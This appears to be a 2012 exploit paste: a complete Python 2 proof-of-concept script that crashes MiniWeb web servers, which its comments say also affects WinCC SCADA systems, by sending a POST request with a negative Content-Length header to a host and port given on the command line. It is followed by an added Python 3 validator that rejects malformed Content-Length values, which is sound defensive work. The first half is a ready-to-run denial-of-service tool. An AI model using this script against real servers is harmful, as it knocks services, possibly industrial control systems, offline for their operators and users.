MiniWeb Content-Length DoS PoC Exploit

infodox, May 31st, 2012
#!/usr/bin/env python
# miniweb Content-Length DoS PoC
# Not a 0day, sadly.
# aluigi found this ages back, I independently rediscovered it fuzzing
# and noticed it was still unpatched. Oh well, better disclose so!
# vuln version at code.google.com/p/miniweb/
# affects WinCC also :) (Oh, them SCADA...)
# Massive props to ohdae for helping with this!
# insecurety.net | bindshell.it.cx
import sys
import socket

def banner():
    print """
MiniWeb Killer - Kills MiniWeb
-Insecurety Research
-Bindshell Labs
"""

if len(sys.argv) != 3:
    banner()
    print "Usage: ./MiniDoS.py <host> <port>"
    sys.exit(1)

banner()
target = sys.argv[1]
port = sys.argv[2]

evil = "POST / HTTP/1.1\r\n"
evil += "Host: %s\r\n" %(target)
evil += "User-Agent: MiniWeb Killer ^-^\r\n"
evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
    expl.connect((target, int(port)))
    print "[+] Connected, firing das payload!"
except:
    print "[-] Connection Failed... Is there even a target?"
    sys.exit(1)
try:
    expl.send(evil)
    print "[+] Payload Sent!"
except:
    print "[-] Payload Sending Failure... WTF?"
    sys.exit(1)
expl.close()
print "[*] Should be dead..."
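
A defensive counterpart to the malformed header above, added here as an example and not part of the original paste or of MiniWeb's code: a strict Content-Length check (Python 3) that a server or filtering proxy can apply before the value is used as a length. The function names, the 1 MiB cap and the sample requests are assumptions, and the paste does not state the root cause inside MiniWeb.

```python
import re

MAX_BODY = 1 << 20                  # assumed 1 MiB cap; tune per application
_DIGITS = re.compile(rb"[0-9]+")    # RFC 9110: Content-Length = 1*DIGIT

class BadRequest(ValueError):
    """The request head should be answered with 400/413 and dropped."""

def content_length(head: bytes, max_body: int = MAX_BODY) -> int:
    """Return a validated body length for a raw HTTP request head.

    Signed, non-numeric, conflicting or oversized values are rejected
    instead of being handed to an integer parser and used as a size.
    """
    values = set()
    for line in head.split(b"\r\n")[1:]:        # skip the request line
        if not line:
            break                               # blank line ends the headers
        name, sep, value = line.partition(b":")
        if not sep or name != name.strip():
            raise BadRequest("malformed header line")
        if name.lower() == b"content-length":
            # drop optional whitespace around each comma-separated value
            values.update(v.strip(b" \t") for v in value.split(b","))
    if not values:
        return 0                                # no body announced
    if len(values) > 1:
        raise BadRequest("conflicting Content-Length values")
    raw = values.pop()
    if not _DIGITS.fullmatch(raw):
        raise BadRequest("Content-Length is not 1*DIGIT: %r" % raw)
    length = int(raw)
    if length > max_body:
        raise BadRequest("body larger than %d bytes" % max_body)
    return length

def check(head: bytes) -> str:
    """Turn the validation result into a one-line verdict for logging."""
    try:
        return "accept %d" % content_length(head)
    except BadRequest as exc:
        return "reject: %s" % exc

# Constructed samples: the header value from the paste and a benign request.
MALFORMED = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: -10 \r\n\r\n"
BENIGN = b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 10\r\n\r\n0123456789"

if __name__ == "__main__":
    for sample in (MALFORMED, BENIGN):
        print(check(sample))
```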